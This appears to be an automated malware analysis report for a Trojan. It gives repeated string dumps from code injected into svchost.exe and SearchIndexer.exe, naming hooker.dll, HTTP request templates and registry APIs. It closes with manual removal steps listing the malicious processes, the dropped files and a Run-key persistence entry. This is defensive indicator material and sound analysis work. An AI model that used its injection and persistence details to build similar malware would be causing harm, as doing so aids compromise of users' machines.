alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1732_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1732_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1732_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1732_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1732_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1732_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1732_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1732_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1732_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1732_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1732_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1732_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
TPAutoConnect.exe_2160_rwx_20020000_00001000:
.text
`.rdata
@.data
.reloc
conhost.exe_2168_rwx_20020000_00001000:
.text
`.rdata
@.data
.reloc
SearchIndexer.exe_2228_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchIndexer.exe_2228_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchIndexer.exe_2228_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchIndexer.exe_2228_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchIndexer.exe_2228_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchIndexer.exe_2228_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchIndexer.exe_2228_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchIndexer.exe_2228_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchIndexer.exe_2228_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchIndexer.exe_2228_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchIndexer.exe_2228_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchIndexer.exe_2228_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchIndexer.exe_2228_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchIndexer.exe_2228_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2560_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2560_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2560_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2560_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2560_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2560_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2560_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2560_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2560_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2560_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2560_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2560_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2560_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2560_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
WerFault.exe:1952
wermgr.exe:2556
Noodles V1.1.exe:264
Speed Hook.bat:520
Speed Hook.bat:3732
svshost.bat:2924
NKI.exe:3568
vbc.exe:3520 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Windows\Temp\WER6B71.tmp.hdmp (758423 bytes)
C:\Windows\Temp\WER695D.tmp.WERInternalMetadata.xml (53022 bytes)
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Speed Hook.bat_5742fda22970a3feda1f8aed145a339bd73dc92f_cab_07a56e0d\WER6D65.tmp.mdmp (3073 bytes)
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Speed Hook.bat_5742fda22970a3feda1f8aed145a339bd73dc92f_cab_07a56e0d\WER695D.tmp.WERInternalMetadata.xml (3 bytes)
C:\Windows\Temp\WER67F5.tmp.appcompat.txt (698 bytes)
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Speed Hook.bat_5742fda22970a3feda1f8aed145a339bd73dc92f_cab_07a56e0d\Report.wer (182296 bytes)
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Speed Hook.bat_5742fda22970a3feda1f8aed145a339bd73dc92f_cab_07a56e0d\WER67F5.tmp.appcompat.txt (2 bytes)
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Speed Hook.bat_5742fda22970a3feda1f8aed145a339bd73dc92f_cab_07a56e0d\WER6B71.tmp.hdmp (37269 bytes)
C:\Windows\Temp\WER6D65.tmp.mdmp (151168 bytes)
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Speed Hook.bat_5742fda22970a3feda1f8aed145a339bd73dc92f_cab_07a56e0d\Report.wer.tmp (189000 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xSpeed.sys (48 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\svshost.bat (1588 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Noodles V1.1.exe (32128 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Noodles V1.1mgr.exe (274 bytes)
%Program Files%\Microsoft Fkfygh\Speed Hook.bat (70 bytes)
%Program Files%\AppPatch\kj.dll (119337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\kj[1].jpg (116081 bytes)
C:\ProgramData\EFAXWW\NKI.02 (57 bytes)
C:\ProgramData\EFAXWW\NKI.01 (81 bytes)
C:\ProgramData\PEZ\NKI.004 (7320 bytes)
C:\ProgramData\EFAXWW\NKI.exe (148 bytes)
C:\ProgramData\EFAXWW\NKI.00 (2 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Noodles V1.1.exe (1521 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NKI Start" = "C:\ProgramData\EFAXWW\NKI.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.